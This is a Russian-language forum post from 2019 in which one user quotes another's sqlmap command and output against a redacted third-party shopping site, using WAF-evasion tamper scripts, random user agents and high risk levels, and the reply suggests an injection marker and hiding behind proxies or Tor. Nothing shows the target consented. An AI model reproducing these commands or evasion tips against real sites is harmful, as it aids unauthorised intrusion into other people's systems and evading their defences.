Показать сообщение отдельно

  #8  
Старый 13.03.2019, 00:21
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от EricZ  

всем привет
помогите плз разобраться
sqlmap --url "
https://www.******.com/***/****/*******/********a-100-ml.html?query=query+AND+1=1+--+
" --dbs --random-agent --technique=BEUQ --tamper=space2comment.py --level=3 --risk=3
___
__H__
___ ___[']_____ ___ ___ {1.3.2#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_|
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 20:41:22 /2019-03-12/
[20:41:22] [INFO] loading tamper module 'space2comment'
[20:41:22] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11' from file '/usr/share/sqlmap/txt/user-agents.txt'
[20:41:22] [WARNING] it appears that you have provided tainted parameter values ('query=query AND 1%3D1 -- ') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[20:41:29] [INFO] testing connection to the target URL
[20:41:44] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
[20:41:44] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:41:51] [INFO] testing if the target URL content is stable
[20:41:55] [INFO] target URL content is stable
[20:41:55] [INFO] testing if GET parameter 'query' is dynamic
[20:42:02] [WARNING] GET parameter 'query' does not appear to be dynamic
[20:42:52] [WARNING] heuristic (basic) test shows that GET parameter 'query' might not be injectable
[20:43:00] [INFO] testing for SQL injection on GET parameter 'query'
[20:43:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:43:23] [WARNING] turning off pre-connect mechanism because of connection reset(s)
[20:43:23] [WARNING] there is a possibility that the target (or WAF/IPS) is resetting 'suspicious' requests
[20:43:23] [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s)
так понимаю надо темперы подбирать и time-sec увеличивать?
По пробуй вот так https://www.******.com/***/****/*******/********a-100-ml.html?query=*"

+ подрубай прокси или Tor
 
Ответить с цитированием